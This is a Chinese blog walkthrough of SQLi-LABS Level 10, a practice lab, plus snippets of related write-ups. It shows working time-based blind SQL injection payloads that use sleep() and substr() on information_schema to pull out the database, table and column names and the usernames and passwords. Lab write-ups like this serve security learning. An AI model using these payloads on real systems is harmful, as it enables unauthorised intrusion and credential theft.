SQLi-LABS第十关

最新推荐文章于 2025-07-20 10:12:30 发布
原创 最新推荐文章于 2025-07-20 10:12:30 发布 · 546 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #安全

目录

1.首先观察页面,发现提示id为参,我们尝试传参

2.判断注入类型

3.判断数据表的列数

4.判断数据库名

5.判断表名

6.查看其所有字段的名字

7.查看表中的所有数据

1.首先观察页面,发现提示id为参,我们尝试传参

我们尝试传参,观察页面是否有变化

发现有变化,我们尝试sql注入

2.判断注入类型

输入?id=1 and 1=2,判断是否为数字型注入,若语句生效,则为数字型注入,反之则不是。

我们发现页面无变化,初步判断不是数字型注入,接下来我们输入?id=1' and 1=2--+,观察页面是否有变化,如果有变化即为字符型注入,反之,我们需要继续查看。

页面没有发生变化,我们来判断闭合方式。发现无论如何都不会发生变化,初步判断是时间盲注,我们来验证一下。

发现无延迟,判断不是数字型注入,接下来我们尝试字符型注入。

这里我们需要判断一下闭合方式。

有延迟,我们可以得出其闭合方式为”。

3.判断数据表的列数

我们输入?id=1" and sleep(5) order by 3--+ 来判断其有多少列

我们发现值为3时可以页面有延迟,但是当值为4时,页面无延迟,所以我们判断其共有三列。

4.判断数据库名

输入?id=1" and if(substr(database(),1,1)='a',sleep(3),1)--+来判断数据库的第一个字母是否是a

发现无延迟,由此我们可以得知其不是a,我们进行枚举,最终得到数据库名security。

5.判断表名

接下来我们寻找数据库表名,使用语句?id=1” and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(5),1)--+来判断security的第一个表的第一个单词是不是a

通过枚举,最终得到第一个表名email,如法炮制,即可得到所有表名。

第二个表名为referers

第三个表名为uagents

第四个表名为users

6.查看其所有字段的名字

我们使用?id=1” and if(substr((select column_name from information_schema.columns where table_schema='security'and table_name='users' limit 0,1),1,1)='a',sleep(5),1)--+来判断users表的第一个字段是否为a

通过枚举,我们得到了id,如法炮制

这样一来,我们便可以得知有三个字段,分别为id,username,password。

7.查看表中的所有数据

这里我们使用语句?id=1' and if(substr((select username from users limit 0,1),1,1)='a',sleep(5),1)--+来对username列中的第一个值进行判断,观察其是否为a

通过枚举,我们得到第一个用户名dump,接下来的操作与前面无异,可一直获取用户名。而对于密码,我们只需将username字段改为password即可获得密码,这里就不一一展示。到这里,我们就得到了数据库的全部敏感信息,第十关结束!

sqli-labs卡9(基于get提交的单引号闭合的时间盲注)通思路
zyh1588的博客
10-31 1175
小白回顾sqli-labs靶场第九(时间盲注)
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2572
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs笔记-第09 GET时间盲注(单引号闭合 手工注入+脚本注入两种方法)
最新发布
mooyuan的网络安全博客
07-20 1056
SQLI-LABS 是一个专门为学习和练习 SQL 注入技术而设计的开源靶场环境,本小节通过手工注入和脚本注入共两种方法对第09Less 09基于单引号闭合的时间盲注SQL注入卡进行渗透实战。  
sqli-labs10详细教程
ppkr_itt的博客
10-28 1344
id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))=117,sleep(3),1)--+爆破。id=1’))?id=1" and if(ascii(substr(database(),1,1))>117,sleep(3),1)--+,页面睡眠了三秒。
sqli-labs第九&第十(延时盲注)
qq_42266432的博客
08-20 1475
刚开始进入这一时对这一进行了常规的注入过程,并未发现有可以利用的地方,然后怎么办呢?去作弊嘛,看了看标题,第九叫"time based-single quotes"基于时间—单引号,于是乎,就去试了试时间盲注,使用单引号闭合,请求如下: http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ 然后发现这个请求延时了3S 进行到这里,就有了一套完整的思路,时间盲注和之前的布尔盲注思路差不多,布尔盲注靠UI
SQLi-LABS第九
fristchoice的博客
07-10 815
摘要:本文详细记录了针对一个SQL注入漏洞的完整测试流程。首先通过参数测试判断注入类型为字符型时间盲注,然后逐步获取数据库信息:确定表列数为3,获取数据库名security,枚举4个表名(email、referers、uagents、users),解析users表的字段结构(id、username、password),最终通过时间延迟技术获取具体用户数据。整个过程展示了从基础注入检测到完整数据提取的技术细节,最终成功获取数据库全部敏感信息。
sqli-labs:第九
J_linnb的博客
05-03 1486
【代码】sqli-labs:第九
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2053
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1237
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs第14(三种方法)
a853869302536的博客
10-06 1282
一种是--data="',这种方便一点,不需要保存。直接将需要提交的数据复制粘贴过来就好了。因为一次性显示不完,所以加了个substr()截取。另一种是-r,这种需要先将http请求包保存到txt文件里面。登录成功和失败有不同的图片显示,所以可以使用布尔盲注。发现输入错误下方会有报错提示,所以可以尝试报错注入。根据报错的提示,可以判断出双引号闭合。这里面有很多命令,有需要可以查查。成功显示当前库名,可以继续爆表名。这里我就列名和字段一起爆了。成功登录时是flag.jpg。所以可以用脚本跑一下。
Sqli-labs靶场第19详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 981
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1997
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-labs第九
qq_56726035的博客
04-08 880
sqli-labs第九
SQL注入:sqli-labs靶场通(第九 时间盲注)
l258282的博客
12-05 2386
网络安全
SQLI-labs-第九第十
weixin_54055099的博客
04-14 1171
sqlilab 第9和第10,时间盲注
sqli-labs-------第八、九
wyzhxhn的博客
11-09 348
布尔盲注,时间盲注
sql-labs靶场第九测试报告
ccc_9wy的博客
10-06 1284
sql-labs靶场第九的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程。
sqli-labs靶场第九
gou1791241251的博客
12-26 1693
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了十秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六的盲注,把条件换成沉睡10秒即可。 ...
sqli-labs第9教程
ppkr_itt的博客
10-26 991
这一我们用的是基于时间的盲注,基于时间的盲注也叫做延时注入,;
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值